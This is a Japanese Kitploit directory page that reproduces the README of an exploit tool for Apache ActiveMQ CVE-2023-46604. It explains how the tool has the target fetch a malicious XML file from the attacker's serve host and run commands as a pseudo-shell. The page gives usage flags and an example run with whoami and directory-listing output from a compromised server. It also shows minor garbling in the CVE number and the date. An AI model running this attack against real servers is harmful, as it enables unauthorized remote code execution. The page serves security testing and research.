Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — このスクリプトは、CVE-2023046604(Apache ActiveMQ)を利用して疑似シェルを生成します。この脆弱性は、OpenWireプロトコル内の安全でないデシリアライゼーションにより、リモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

このスクリプトは、CVE-2023046604(Apache ActiveMQ)を利用して疑似シェルを生成します。この脆弱性は、OpenWireプロトコル内の安全でないデシリアライゼーションにより、リモートコード実行を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1962年前未レビュー

CVE-2023-46604 RCE 疑似シェル

このスクリプトは、CVE-2023046604 (Apache ActiveMQ) を利用して疑似シェルを生成します。この脆弱性は、OpenWire プロトコル内の安全でない逆シリアライゼーションにより、リモートコード実行を可能にします。

説明

CVE-2023-46604 は、Apache ActiveMQ の OpenWire プロトコルに存在する逆シリアライゼーションの脆弱性です。この欠陥は、攻撃者が ActiveMQ が稼働しているサーバー上で任意のコードを実行するために悪用される可能性があります。攻撃者は悪意のある XML ファイルを作成でき、そのファイル内のコマンドがリモートサーバーによって実行されます。

このエクスプロイトは、XML ドキュメント作成のプロセスを自動化・抽象化し、ファイルを配信するための基本的なサーバーを提供し、POST 経由でターゲットサーバーから情報を受け取ります。これにより、リバースシェルを起動したりバイナリを展開したりする必要なく、継続的な悪用が可能になります。

前提条件

エクスプロイトスクリプトを実行する前に、以下が整っていることを確認してください:

  • システムに Python 3.x がインストールされていること。
  • 脆弱性のある ActiveMQ サーバーへのネットワークアクセスがあること。
  • 脆弱性のあるサーバーに対してテストを実行する許可があること。

使用方法

このスクリプトには以下が必要です:

  • ActiveMQ サーバーの IP またはホスト名
  • Serve IP(ターゲットから到達可能な、お使いのシステム上の IP)

オプション:

  • ActiveMQ サーバーのポート - デフォルトは 61616
  • Serve ポート(ローカルサーバーを起動するポート)- デフォルトは 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

実行例

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

クレジット

このエクスプロイトは、X1r0z による Go 製のオリジナル POC と、evkl1d による Python POC を基に構築されています。

免責事項

このコードは、教育目的および倫理的なセキュリティテストの目的でのみ提供されます。これは責任を持って使用され、明示的な許可が付与された環境でのみ使用されるべきです。無許可または悪意のある使用は固く禁止されています。このコードを使用することにより、お客様は該当する法域で適用されるすべての適用法、規制、および倫理基準を遵守することに同意したものとみなされます。作成者および貢献者は、このコードの誤用または無許可の使用から生じるいかなる損害や結果についても責任を負いません。

ツールをダウンロード